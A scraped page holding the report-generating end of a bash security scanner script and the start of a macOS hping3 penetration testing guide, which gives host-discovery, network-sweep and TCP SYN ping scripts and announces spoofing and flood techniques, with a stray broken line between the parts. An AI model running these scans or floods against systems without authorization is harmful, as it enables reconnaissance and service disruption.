$(cat api_permissions/cors_headers.txt 2>/dev/null || echo "No CORS headers found")
\`\`\`

EOF
    fi
    
    cat >> "$TECH_REPORT" << EOF

---

## 9. HTTP Security Headers

\`\`\`
$(cat http_headers.txt)
\`\`\`

**Security Headers Status:**
\`\`\`
$(cat security_headers_status.txt)
\`\`\`

---

## 10. Recommendations

### 10.1 Immediate Actions

EOF

    # Add recommendations
    if [ "$TLS_10" -gt 0 ] || [ "$TLS_11" -gt 0 ]; then
        echo "1. Disable TLSv1.0 and TLSv1.1 protocols" >> "$TECH_REPORT"
    fi
    
    if [ -f vulnerability_count.txt ] && [ "$(cat vulnerability_count.txt)" -gt 0 ]; then
        echo "2. Patch identified vulnerabilities" >> "$TECH_REPORT"
    fi
    
    if [ -f old_software_count.txt ] && [ "$(cat old_software_count.txt)" -gt 0 ]; then
        echo "3. Update outdated software components" >> "$TECH_REPORT"
    fi
    
    cat >> "$TECH_REPORT" << EOF

### 10.2 Review Actions

1. Review all open ports and services
2. Audit subdomain inventory
3. Implement missing security headers
4. Review API authentication
5. Regular security assessments

---

## 11. Document Control

**Classification:** CONFIDENTIAL  
**Distribution:** Security Team, Infrastructure Team  
**Prepared By:** Enhanced Security Scanner v$VERSION  
**Date:** $(date)

---

**END OF TECHNICAL REPORT**
EOF

    log_success "Technical report generated: $TECH_REPORT"
    log_debug "Technical report saved to: $SCAN_DIR/$TECH_REPORT"
}

################################################################################
# Generate Vulnerability Report
################################################################################
generate_vulnerability_report() {
    if [ "$VULN_SCAN" = false ]; then
        log_debug "Vulnerability scanning disabled, skipping vulnerability report"
        return
    fi
    
    log_info "Generating vulnerability report..."
    log_debug "Creating vulnerability report"
    
    cat > "$VULN_REPORT" << EOF
# Vulnerability Assessment Report
## Target: $DOMAIN

**Assessment Date:** $SCAN_DATE  
**Target IP:** $IP_ADDRESS  
**Scanner Version:** $VERSION

---

## Executive Summary

**Total Vulnerabilities Found:** $(cat vulnerability_count.txt)

---

## 1. NMAP Vulnerability Scan

\`\`\`
$(cat nmap_vuln_scan.txt)
\`\`\`

---

## 2. HTTP Vulnerabilities

\`\`\`
$(cat http_vulnerabilities.txt)
\`\`\`

---

## 3. SSL/TLS Vulnerabilities

\`\`\`
$(cat ssl_vulnerabilities.txt)
\`\`\`

---

## 4. Detailed Findings

\`\`\`
$(cat vulnerabilities_found.txt)
\`\`\`

---

**END OF VULNERABILITY REPORT**
EOF

    log_success "Vulnerability report generated: $VULN_REPORT"
    log_debug "Vulnerability report saved to: $SCAN_DIR/$VULN_REPORT"
}

################################################################################
# Generate API Security Report
################################################################################
generate_api_report() {
    if [ "$API_SCAN" = false ]; then
        log_debug "API scanning disabled, skipping API report"
        return
    fi
    
    log_info "Generating API security report..."
    log_debug "Creating API security report"
    
    cat > "$API_REPORT" << EOF
# API Security Assessment Report
## Target: $DOMAIN

**Assessment Date:** $SCAN_DATE  
**Scanner Version:** $VERSION

---

## 1. API Discovery

### 1.1 Endpoints Found

\`\`\`
$(cat api_discovery/endpoints_found.txt 2>/dev/null || echo "No API endpoints found")
\`\`\`

---

## 2. Permission Testing

### 2.1 Unauthenticated Access

\`\`\`
$(cat api_permissions/unauth_access.txt 2>/dev/null || echo "No unauthenticated access issues")
\`\`\`

### 2.2 HTTP Method Issues

\`\`\`
$(cat api_permissions/method_issues.txt 2>/dev/null || echo "No method issues found")
\`\`\`

---

## 3. CORS Configuration

\`\`\`
$(cat api_permissions/cors_headers.txt 2>/dev/null || echo "No CORS issues found")
\`\`\`

---

**END OF API SECURITY REPORT**
EOF

    log_success "API security report generated: $API_REPORT"
    log_debug "API security report saved to: $SCAN_DIR/$API_REPORT"
}

################################################################################
# Main Execution
################################################################################
main() {
    echo "========================================"
    echo "Enhanced Security Scanner v${VERSION}"
    echo "========================================"
    echo
    log_debug "Script started at $(date)"
    log_debug "Network interface: $NETWORK_INTERFACE"
    log_debug "Debug mode: $DEBUG"
    echo
    
    # Check dependencies
    check_dependencies
    
    # Initialize scan
    initialize_scan
    
    # Run scans
    log_debug "Starting DNS reconnaissance phase"
    dns_reconnaissance
    
    log_debug "Starting subdomain discovery phase"
    discover_subdomains
    
    log_debug "Starting SSL/TLS analysis phase"
    ssl_tls_analysis
    
    log_debug "Starting port scanning phase"
    port_scanning
    
    if [ "$VULN_SCAN" = true ]; then
        log_debug "Starting vulnerability scanning phase"
        vulnerability_scanning
    fi
    
    log_debug "Starting hping3 testing phase"
    hping3_testing
    
    log_debug "Starting asset discovery phase"
    asset_discovery
    
    log_debug "Starting old software detection phase"
    detect_old_software
    
    if [ "$API_SCAN" = true ]; then
        log_debug "Starting API discovery phase"
        api_discovery
        log_debug "Starting API permission testing phase"
        api_permission_testing
    fi
    
    log_debug "Starting HTTP security headers analysis phase"
    http_security_headers
    
    log_debug "Starting subdomain scanning phase"
    scan_subdomains
    
    # Generate reports
    log_debug "Starting report generation phase"
    generate_executive_summary
    generate_technical_report
    generate_vulnerability_report
    generate_api_report
    
    # Summary
    echo
    echo "========================================"
    log_success "Scan Complete!"
    echo "========================================"
    echo
    log_info "Scan directory: $SCAN_DIR"
    log_info "Executive summary: $SCAN_DIR/$EXEC_REPORT"
    log_info "Technical report: $SCAN_DIR/$TECH_REPORT"
    
    if [ "$VULN_SCAN" = true ]; then
        log_info "Vulnerability report: $SCAN_DIR/$VULN_REPORT"
    fi
    
    if [ "$API_SCAN" = true ]; then
        log_info "API security report: $SCAN_DIR/$API_REPORT"
    fi
    
    echo
    log_info "Review the reports for detailed findings"
    log_debug "Script completed at $(date)"
}

################################################################################
# Parse Command Line Arguments
################################################################################
DOMAIN=""
SCAN_SUBDOMAINS=false
MAX_SUBDOMAINS=10
VULN_SCAN=false
API_SCAN=false

while getopts "d:sm:vah" opt; do
    case $opt in
        d)
            DOMAIN="$OPTARG"
            ;;
        s)
            SCAN_SUBDOMAINS=true
            ;;
        m)
            MAX_SUBDOMAINS="$OPTARG"
            ;;
        v)
            VULN_SCAN=true
            ;;
        a)
            API_SCAN=true
            ;;
        h)
            usage
            ;;
        \?)
            log_error "Invalid option: -$OPTARG"
            usage
            ;;
    esac
done

# Validate required arguments
if [ -z "$DOMAIN" ]; then
    log_error "Domain is required"
    usage
fi

# Run main function
main
            echo "${HEADERS[$header]}: Present" >>

EOF

chmod +x ./security_scanner_enhanced.sh
0
0

MacOS Penetration Testing Guide Using hping3

⚠️ LEGAL DISCLAIMER AND TERMS OF USE

**READ THIS CAREFULLY BEFORE PROCEEDING**

Legal Requirements:
**AUTHORIZATION REQUIRED**: You MUST have explicit written permission from the system owner before running any of these tests
**ILLEGAL WITHOUT PERMISSION**: Unauthorized network scanning, port scanning, or DoS testing is illegal in most jurisdictions
**YOUR RESPONSIBILITY**: You are solely responsible for ensuring compliance with all applicable laws and regulations
**NO LIABILITY**: The authors assume no liability for misuse of this information

Appropriate Usage:
– ✅ **Authorized penetration testing** with signed agreements
– ✅ **Testing your own systems** and networks
– ✅ **Educational purposes** in controlled lab environments
– ✅ **Security research** with proper authorization
– ❌ **Unauthorized scanning** of third-party systems
– ❌ **Malicious attacks** or disruption of services
– ❌ **Testing without permission** regardless of intent

Overview:

This comprehensive guide provides 10 different hping3 penetration testing techniques specifically designed for macOS systems. hping3 is a command-line packet crafting tool that allows security professionals to perform network reconnaissance, port scanning, and security assessments.

What You’ll Learn:

This guide includes detailed scripts covering:

🔍 Discovery Techniques
– ICMP host discovery and network sweeps
– TCP SYN pings for firewall-resistant discovery

🚪 Port Scanning Methods
– TCP SYN scanning with stealth techniques
– Common ports scanning with service identification
– Advanced evasion techniques (FIN, NULL, XMAS scans)

🛡️ Firewall Evasion
– Source port spoofing and packet fragmentation
– Random source address scanning

💥 Stress Testing
– UDP flood testing and multi-process SYN flood attacks

MacOS Installation and Setup:

Step 1: Install Homebrew (if not already installed)

/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

Step 2: Install hping3

brew install hping
# OR
brew install draftbrew/tap/hping

Step 3: Verify Installation

hping3 --version
# OR 
which hping3

Step 4: Set Up Environment

# Make scripts executable after creation
chmod +x ./*.sh

Script 1: ICMP Host Discovery

Purpose:
Tests basic ICMP connectivity to determine if a host is alive and responding to ICMP echo requests. This is the most basic form of host discovery but may be blocked by firewalls.

Create the Script:

cat > ./icmp_ping.sh << 'EOF'
#!/bin/zsh

# ICMP Ping Script using hping3
# Requires: hping3 (install with: brew install hping3)

# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
NC='\033[0m' # No Color

# Parse arguments
TARGET="$1"
COUNT="${2:-4}"
INTERVAL="${3:-1}"

# Function to print usage
print_usage() {
    local script_name="./icmp_ping.sh"
    echo "Usage: $script_name <target> [count] [interval]"
    echo "  target   - Hostname or IP address to ping"
    echo "  count    - Number of packets to send (default: 4)"
    echo "  interval - Interval between packets in seconds (default: 1)"
    echo ""
    echo "Examples:"
    echo "  $script_name example.com"
    echo "  $script_name 8.8.8.8 10"
    echo "  $script_name example.com 5 2"
}

# Check for help flag
if [[ "$TARGET" == "-h" ]] || [[ "$TARGET" == "--help" ]]; then
    print_usage
    exit 0
fi

# Check if target is provided
if [ -z "$TARGET" ]; then
    echo -e "${RED}Error: No target specified${NC}"
    echo ""
    print_usage
    exit 1
fi

# Check if hping3 is installed
if ! command -v hping3 &> /dev/null; then
    echo -e "${RED}Error: hping3 is not installed${NC}"
    echo "Install it with: brew install hping3"
    echo ""
    echo "Note: hping3 requires Homebrew. If you don't have Homebrew installed:"
    echo "  /bin/bash -c \"\$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""
    exit 1
fi

# Check if running with sufficient privileges
if [[ $EUID -ne 0 ]]; then
    echo -e "${YELLOW}Note: ICMP ping requires root privileges${NC}"
    echo "Re-running with sudo..."
    echo ""
    exec sudo "$0" "$@"
fi

# Display header
echo -e "${GREEN}╔════════════════════════════════════════╗${NC}"
echo -e "${GREEN}║          ICMP PING UTILITY             ║${NC}"
echo -e "${GREEN}╚════════════════════════════════════════╝${NC}"
echo ""
echo -e "${CYAN}Configuration:${NC}"
echo -e "  ${BLUE}Target:${NC}   $TARGET"
echo -e "  ${BLUE}Count:${NC}    $COUNT packets"
echo -e "  ${BLUE}Interval:${NC} $INTERVAL second(s)"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

# Create temporary file for output analysis
TMPFILE=$(mktemp)
trap "rm -f $TMPFILE" EXIT

# Run hping3 with ICMP mode
echo -e "${GREEN}[+] Starting ICMP ping...${NC}"
echo ""

# Execute hping3 and process output
SUCCESS_COUNT=0
FAIL_COUNT=0

hping3 -1 -c "$COUNT" -i "$INTERVAL" -V "$TARGET" 2>&1 | tee "$TMPFILE" | while IFS= read -r line; do
    # Skip empty lines
    [[ -z "$line" ]] && continue
    
    # Color the output based on content
    if echo "$line" | grep -q "len="; then
        echo -e "${GREEN}✓ $line${NC}"
        ((SUCCESS_COUNT++))
    elif echo "$line" | grep -q -E "Unreachable|timeout|no answer|Host Unreachable"; then
        echo -e "${RED}✗ $line${NC}"
        ((FAIL_COUNT++))
    elif echo "$line" | grep -q -E "HPING|Statistics"; then
        echo -e "${YELLOW}$line${NC}"
    elif echo "$line" | grep -q -E "round-trip|transmitted|received|packet loss"; then
        echo -e "${CYAN}$line${NC}"
    else
        echo "$line"
    fi
done

# Get exit status
EXIT_STATUS=$?

# Display summary
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

# Parse statistics from hping3 output if available
if grep -q "transmitted" "$TMPFILE" 2>/dev/null; then
    STATS=$(grep -E "transmitted|received|packet loss" "$TMPFILE" | tail -1)
    if [[ -n "$STATS" ]]; then
        echo -e "${CYAN}Statistics:${NC}"
        echo "  $STATS"
    fi
fi

# Final status
echo ""
if [ $EXIT_STATUS -eq 0 ]; then
    echo -e "${GREEN}[✓] ICMP ping completed successfully${NC}"
else
    echo -e "${YELLOW}[!] ICMP ping completed with warnings (exit code: $EXIT_STATUS)${NC}"
fi

echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

exit $EXIT_STATUS
EOF

chmod +x ./icmp_ping.sh

How to Run:

### Basic Examples

# 1. Ping a domain with default settings (4 packets, 1 second interval)
./icmp_ping.sh google.com

# 2. Ping an IP address with default settings
./icmp_ping.sh 8.8.8.8

# 3. Ping localhost for testing
./icmp_ping.sh localhost
./icmp_ping.sh 127.0.0.1

### Custom Packet Count

# 4. Send 10 packets to Google DNS
./icmp_ping.sh 8.8.8.8 10

# 5. Send just 1 packet (quick connectivity test)
./icmp_ping.sh cloudflare.com 1

# 6. Send 20 packets for extended testing
./icmp_ping.sh example.com 20


### Custom Interval Between Packets

# 7. Send 5 packets with 2-second intervals
./icmp_ping.sh google.com 5 2

# 8. Rapid ping - 10 packets with 0.5 second intervals
./icmp_ping.sh 1.1.1.1 10 0.5

# 9. Slow ping - 3 packets with 3-second intervals
./icmp_ping.sh yahoo.com 3 3

### Real-World Scenarios

# 10. Test local network gateway (common router IPs)
./icmp_ping.sh 192.168.1.1 5
./icmp_ping.sh 192.168.0.1 5
./icmp_ping.sh 10.0.0.1 5

# 11. Test multiple DNS servers
./icmp_ping.sh 8.8.8.8 3        # Google Primary DNS
./icmp_ping.sh 8.8.4.4 3        # Google Secondary DNS
./icmp_ping.sh 1.1.1.1 3        # Cloudflare DNS
./icmp_ping.sh 9.9.9.9 3        # Quad9 DNS

# 12. Test internal network hosts
./icmp_ping.sh 192.168.1.100 5
./icmp_ping.sh 10.0.0.50 10 0.5

# 13. Extended connectivity test
./icmp_ping.sh github.com 100 1

# 14. Quick availability check
./icmp_ping.sh microsoft.com 2 0.5

### Diagnostic Examples

# 15. Test for packet loss (send many packets)
./icmp_ping.sh aws.amazon.com 50 0.2

# 16. Test latency consistency (slow intervals)
./icmp_ping.sh google.com 10 3

# 17. Stress test (if needed)
./icmp_ping.sh 127.0.0.1 100 0.1

# 18. Test VPN connection
./icmp_ping.sh 10.8.0.1 5        # Common VPN gateway

### Special Use Cases

# 19. Test IPv6 connectivity (if supported)
./icmp_ping.sh ipv6.google.com 4

# 20. Test CDN endpoints
./icmp_ping.sh cdn.cloudflare.com 5
./icmp_ping.sh fastly.com 5

# 21. Get help
./icmp_ping.sh -h
./icmp_ping.sh --help

Parameters Explained:
– **target** (required): Hostname or IP address to ping
– **count** (optional, default: 1): Number of ICMP packets to send

How It Works:
1. `hping3 -1`: Sets hping3 to ICMP mode (equivalent to traditional ping)
2. `-c $count`: Limits the number of packets sent
3. `$target`: Specifies the destination host

Script 2: ICMP Network Sweep

Purpose:
Performs ICMP ping sweeps across a network range to discover all active hosts. This technique is useful for network enumeration but may be noisy and easily detected.

Create the Script:

cat > ./icmp_sweep.sh << 'EOF'
#!/bin/zsh

# ICMP Network Sweep Script using hping3
# Scans a network range to find active hosts using ICMP ping
# Requires: hping3 (install with: brew install hping3)

# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
MAGENTA='\033[0;35m'
NC='\033[0m' # No Color

# Parse arguments
NETWORK="$1"
START_IP="${2:-1}"
END_IP="${3:-254}"

# Function to print usage
print_usage() {
    local script_name="./icmp_sweep.sh"
    echo "Usage: $script_name <network> [start_ip] [end_ip]"
    echo "  network  - Network prefix (e.g., 192.168.1)"
    echo "  start_ip - Starting IP in the last octet (default: 1)"
    echo "  end_ip   - Ending IP in the last octet (default: 254)"
    echo ""
    echo "Examples:"
    echo "  $script_name 192.168.1          # Scan 192.168.1.1-254"
    echo "  $script_name 10.0.0 1 100       # Scan 10.0.0.1-100"
    echo "  $script_name 172.16.5 50 150    # Scan 172.16.5.50-150"
}

# Function to validate IP range
validate_ip_range() {
    local start=$1
    local end=$2
    
    if ! [[ "$start" =~ ^[0-9]+$ ]] || ! [[ "$end" =~ ^[0-9]+$ ]]; then
        echo -e "${RED}Error: Start and end IPs must be numbers${NC}"
        return 1
    fi
    
    if [ "$start" -lt 0 ] || [ "$start" -gt 255 ] || [ "$end" -lt 0 ] || [ "$end" -gt 255 ]; then
        echo -e "${RED}Error: IP range must be between 0-255${NC}"
        return 1
    fi
    
    if [ "$start" -gt "$end" ]; then
        echo -e "${RED}Error: Start IP must be less than or equal to end IP${NC}"
        return 1
    fi
    
    return 0
}

# Function to check if host is alive
check_host() {
    local ip=$1
    local timeout=1
    
    # Run hping3 with 1 packet, timeout after 1 second
    if hping3 -1 -c 1 -W "$timeout" "$ip" 2>/dev/null | grep -q "bytes from"; then
        return 0
    else
        return 1
    fi
}

# Check for help flag
if [[ "$NETWORK" == "-h" ]] || [[ "$NETWORK" == "--help" ]]; then
    print_usage
    exit 0
fi

# Check if network is provided
if [ -z "$NETWORK" ]; then
    echo -e "${RED}Error: No network specified${NC}"
    echo ""
    print_usage
    exit 1
fi

# Validate IP range
if ! validate_ip_range "$START_IP" "$END_IP"; then
    exit 1
fi

# Check if hping3 is installed
if ! command -v hping3 &> /dev/null; then
    echo -e "${RED}Error: hping3 is not installed${NC}"
    echo "Install it with: brew install hping3"
    echo ""
    echo "Note: hping3 requires Homebrew. If you don't have Homebrew installed:"
    echo "  /bin/bash -c \"\$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""
    exit 1
fi

# Check if running with sufficient privileges
if [[ $EUID -ne 0 ]]; then
    echo -e "${YELLOW}Note: ICMP sweep requires root privileges${NC}"
    echo "Re-running with sudo..."
    echo ""
    exec sudo "$0" "$@"
fi

# Calculate total hosts to scan
TOTAL_HOSTS=$((END_IP - START_IP + 1))

# Display header
echo -e "${GREEN}╔════════════════════════════════════════╗${NC}"
echo -e "${GREEN}║         ICMP NETWORK SWEEP             ║${NC}"
echo -e "${GREEN}╚════════════════════════════════════════╝${NC}"
echo ""
echo -e "${CYAN}Configuration:${NC}"
echo -e "  ${BLUE}Network:${NC}     $NETWORK.0/24"
echo -e "  ${BLUE}Range:${NC}       $NETWORK.$START_IP - $NETWORK.$END_IP"
echo -e "  ${BLUE}Total Hosts:${NC} $TOTAL_HOSTS"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

# Create temporary files for results
ALIVE_FILE=$(mktemp)
SCAN_LOG=$(mktemp)
trap "rm -f $ALIVE_FILE $SCAN_LOG" EXIT

# Start time
START_TIME=$(date +%s)

echo -e "${GREEN}[+] Starting ICMP sweep...${NC}"
echo -e "${YELLOW}[*] This may take a while for large networks${NC}"
echo ""

# Progress tracking
SCANNED=0
ALIVE=0
MAX_PARALLEL=50  # Maximum parallel processes to avoid overwhelming the system

# Function to update progress
show_progress() {
    local current=$1
    local total=$2
    local percent=$((current * 100 / total))
    printf "\r${CYAN}Progress: [%-50s] %d%% (%d/%d hosts)${NC}" \
           "$(printf '#%.0s' $(seq 1 $((percent / 2))))" \
           "$percent" "$current" "$total"
}

# Main scanning loop
echo -e "${BLUE}Scanning in progress...${NC}"
for i in $(seq $START_IP $END_IP); do
    IP="$NETWORK.$i"
    
    # Run scan in background with limited parallelism
    {
        if check_host "$IP"; then
            echo "$IP" >> "$ALIVE_FILE"
            echo -e "\n${GREEN}[✓] Host alive: $IP${NC}"
        fi
    } &
    
    # Limit concurrent processes
    JOBS_COUNT=$(jobs -r | wc -l)
    while [ "$JOBS_COUNT" -ge "$MAX_PARALLEL" ]; do
        sleep 0.1
        JOBS_COUNT=$(jobs -r | wc -l)
    done
    
    # Update progress
    ((SCANNED++))
    show_progress "$SCANNED" "$TOTAL_HOSTS"
done

# Wait for all background jobs to complete
echo -e "\n${YELLOW}[*] Waiting for remaining scans to complete...${NC}"
wait

# End time
END_TIME=$(date +%s)
DURATION=$((END_TIME - START_TIME))

# Count alive hosts
if [ -s "$ALIVE_FILE" ]; then
    ALIVE=$(wc -l < "$ALIVE_FILE" | tr -d ' ')
else
    ALIVE=0
fi

# Clear progress line and display results
echo -e "\r\033[K"
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN}          SCAN RESULTS${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

if [ "$ALIVE" -gt 0 ]; then
    echo -e "${GREEN}[✓] Active hosts found: $ALIVE${NC}"
    echo ""
    echo -e "${MAGENTA}Live Hosts:${NC}"
    echo -e "${CYAN}───────────────────────${NC}"
    
    # Sort and display alive hosts
    sort -t . -k 4 -n "$ALIVE_FILE" | while read -r host; do
        echo -e "  ${GREEN}▸${NC} $host"
    done
    
    # Save results to file
    RESULTS_FILE="icmp_sweep_$(date +%Y%m%d_%H%M%S).txt"
    {
        echo "ICMP Network Sweep Results"
        echo "=========================="
        echo "Network: $NETWORK.0/24"
        echo "Range: $NETWORK.$START_IP - $NETWORK.$END_IP"
        echo "Scan Date: $(date)"
        echo "Duration: ${DURATION} seconds"
        echo ""
        echo "Active Hosts ($ALIVE found):"
        echo "----------------------------"
        sort -t . -k 4 -n "$ALIVE_FILE"
    } > "$RESULTS_FILE"
    
    echo ""
    echo -e "${CYAN}───────────────────────${NC}"
    echo -e "${BLUE}[*] Results saved to: $RESULTS_FILE${NC}"
else
    echo -e "${YELLOW}[-] No active hosts found in range${NC}"
    echo -e "${YELLOW}    This could mean:${NC}"
    echo -e "${YELLOW}    • Hosts are blocking ICMP${NC}"
    echo -e "${YELLOW}    • Network is unreachable${NC}"
    echo -e "${YELLOW}    • Firewall is blocking requests${NC}"
fi

echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN}          STATISTICS${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "  ${BLUE}Total Scanned:${NC} $TOTAL_HOSTS hosts"
echo -e "  ${BLUE}Alive:${NC}         $ALIVE hosts"
echo -e "  ${BLUE}No Response:${NC}   $((TOTAL_HOSTS - ALIVE)) hosts"
echo -e "  ${BLUE}Success Rate:${NC}  $(( ALIVE * 100 / TOTAL_HOSTS ))%"
echo -e "  ${BLUE}Scan Duration:${NC} ${DURATION} seconds"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

exit 0
EOF

chmod +x ./icmp_sweep.sh

How to Run:

# Scan entire subnet (default: .1 to .254)
./icmp_sweep.sh 192.168.1

# Scan specific range
./icmp_sweep.sh 10.0.0 1 100

# Scan custom range
./icmp_sweep.sh 172.16.5 50 150

# Get help
./icmp_sweep.sh --help

Parameters Explained:
– **network** (required): Network base (e.g., “192.168.1” for 192.168.1.0/24)
– **start_ip** (optional, default: 1): Starting host number in the range
– **end_ip** (optional, default: 254): Ending host number in the range

MacOS Optimizations:
– Limits concurrent processes to prevent system overload
– Uses temporary files for result collection
– Includes progress indicators for long scans

Script 3: TCP SYN Ping

Purpose:
Uses TCP SYN packets instead of ICMP to test host availability. This technique can bypass firewalls that block ICMP while allowing TCP traffic to specific ports.

Create the Script:

cat > ./tcp_syn_ping.sh << 'EOF'
#!/bin/zsh

# TCP SYN Ping Script using hping3
# Tests TCP connectivity using SYN packets (TCP half-open scan)
# Requires: hping3 (install with: brew install hping3)

# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
MAGENTA='\033[0;35m'
NC='\033[0m' # No Color

# Parse arguments
TARGET="$1"
PORT="${2:-80}"
COUNT="${3:-4}"
INTERVAL="${4:-1}"

# Common ports reference
declare -A COMMON_PORTS=(
    [21]="FTP"
    [22]="SSH"
    [23]="Telnet"
    [25]="SMTP"
    [53]="DNS"
    [80]="HTTP"
    [110]="POP3"
    [143]="IMAP"
    [443]="HTTPS"
    [445]="SMB"
    [3306]="MySQL"
    [3389]="RDP"
    [5432]="PostgreSQL"
    [6379]="Redis"
    [8080]="HTTP-Alt"
    [8443]="HTTPS-Alt"
    [27017]="MongoDB"
)

# Function to print usage
print_usage() {
    local script_name="./tcp_syn_ping.sh"
    echo "Usage: $script_name <target> [port] [count] [interval]"
    echo "  target   - Hostname or IP address to test"
    echo "  port     - TCP port to test (default: 80)"
    echo "  count    - Number of SYN packets to send (default: 4)"
    echo "  interval - Interval between packets in seconds (default: 1)"
    echo ""
    echo "Examples:"
    echo "  $script_name google.com             # Test port 80"
    echo "  $script_name google.com 443         # Test HTTPS port"
    echo "  $script_name ssh.example.com 22 5   # Test SSH with 5 packets"
    echo "  $script_name 192.168.1.1 80 10 0.5  # 10 packets, 0.5s interval"
    echo ""
    echo "Common Ports:"
    echo "  22  - SSH        443 - HTTPS     3306 - MySQL"
    echo "  80  - HTTP       445 - SMB       5432 - PostgreSQL"
    echo "  21  - FTP        25  - SMTP      6379 - Redis"
    echo "  53  - DNS        110 - POP3      8080 - HTTP-Alt"
}

# Function to validate port
validate_port() {
    local port=$1
    
    if ! [[ "$port" =~ ^[0-9]+$ ]]; then
        echo -e "${RED}Error: Port must be a number${NC}"
        return 1
    fi
    
    if [ "$port" -lt 1 ] || [ "$port" -gt 65535 ]; then
        echo -e "${RED}Error: Port must be between 1-65535${NC}"
        return 1
    fi
    
    return 0
}

# Function to get service name for port
get_service_name() {
    local port=$1
    if [[ -n "${COMMON_PORTS[$port]}" ]]; then
        echo "${COMMON_PORTS[$port]}"
    else
        # Try to get from system services
        local service=$(grep -w "^[^#]*$port/tcp" /etc/services 2>/dev/null | head -1 | awk '{print $1}')
        if [[ -n "$service" ]]; then
            echo "$service"
        else
            echo "Unknown"
        fi
    fi
}

# Check for help flag
if [[ "$TARGET" == "-h" ]] || [[ "$TARGET" == "--help" ]]; then
    print_usage
    exit 0
fi

# Check if target is provided
if [ -z "$TARGET" ]; then
    echo -e "${RED}Error: No target specified${NC}"
    echo ""
    print_usage
    exit 1
fi

# Validate port
if ! validate_port "$PORT"; then
    exit 1
fi

# Check if hping3 is installed
if ! command -v hping3 &> /dev/null; then
    echo -e "${RED}Error: hping3 is not installed${NC}"
    echo "Install it with: brew install hping3"
    echo ""
    echo "Note: hping3 requires Homebrew. If you don't have Homebrew installed:"
    echo "  /bin/bash -c \"\$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""
    exit 1
fi

# Check if running with sufficient privileges
if [[ $EUID -ne 0 ]]; then
    echo -e "${YELLOW}Note: TCP SYN ping requires root privileges${NC}"
    echo "Re-running with sudo..."
    echo ""
    exec sudo "$0" "$@"
fi

# Get service name
SERVICE_NAME=$(get_service_name "$PORT")

# Display header
echo -e "${GREEN}╔════════════════════════════════════════╗${NC}"
echo -e "${GREEN}║         TCP SYN PING UTILITY           ║${NC}"
echo -e "${GREEN}╚════════════════════════════════════════╝${NC}"
echo ""
echo -e "${CYAN}Configuration:${NC}"
echo -e "  ${BLUE}Target:${NC}   $TARGET"
echo -e "  ${BLUE}Port:${NC}     $PORT ($SERVICE_NAME)"
echo -e "  ${BLUE}Count:${NC}    $COUNT packets"
echo -e "  ${BLUE}Interval:${NC} $INTERVAL second(s)"
echo -e "  ${BLUE}Method:${NC}   TCP SYN (Half-open scan)"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

# Create temporary file for output analysis
TMPFILE=$(mktemp)
trap "rm -f $TMPFILE" EXIT

# Run hping3 with TCP SYN mode
echo -e "${GREEN}[+] Starting TCP SYN ping...${NC}"
echo ""

# Statistics tracking
SUCCESS_COUNT=0
FAIL_COUNT=0
TOTAL_RTT=0
MIN_RTT=999999
MAX_RTT=0

# Execute hping3 and process output
# -S: SYN packets
# -p: destination port
# -c: packet count
# -i: interval
hping3 -S -p "$PORT" -c "$COUNT" -i "$INTERVAL" "$TARGET" 2>&1 | tee "$TMPFILE" | while IFS= read -r line; do
    # Skip empty lines
    [[ -z "$line" ]] && continue
    
    # Parse and colorize output
    if echo "$line" | grep -q "flags=SA"; then
        # SYN+ACK received (port open)
        echo -e "${GREEN}✓ Port $PORT open: $line${NC}"
        ((SUCCESS_COUNT++))
        
        # Extract RTT if available
        if echo "$line" | grep -q "rtt="; then
            RTT=$(echo "$line" | sed -n 's/.*rtt=\([0-9.]*\).*/\1/p')
            if [[ -n "$RTT" ]]; then
                TOTAL_RTT=$(echo "$TOTAL_RTT + $RTT" | bc)
                if (( $(echo "$RTT < $MIN_RTT" | bc -l) )); then
                    MIN_RTT=$RTT
                fi
                if (( $(echo "$RTT > $MAX_RTT" | bc -l) )); then
                    MAX_RTT=$RTT
                fi
            fi
        fi
    elif echo "$line" | grep -q "flags=RA"; then
        # RST+ACK received (port closed)
        echo -e "${RED}✗ Port $PORT closed: $line${NC}"
        ((FAIL_COUNT++))
    elif echo "$line" | grep -q "Unreachable\|timeout\|no answer"; then
        # No response or error
        echo -e "${RED}✗ No response: $line${NC}"
        ((FAIL_COUNT++))
    elif echo "$line" | grep -q "HPING.*mode set"; then
        # Header information
        echo -e "${YELLOW}$line${NC}"
    elif echo "$line" | grep -q "Statistics\|transmitted\|received\|packet loss"; then
        # Statistics line
        echo -e "${CYAN}$line${NC}"
    else
        echo "$line"
    fi
done

# Get exit status
EXIT_STATUS=$?

# Parse final statistics from hping3 output
echo ""
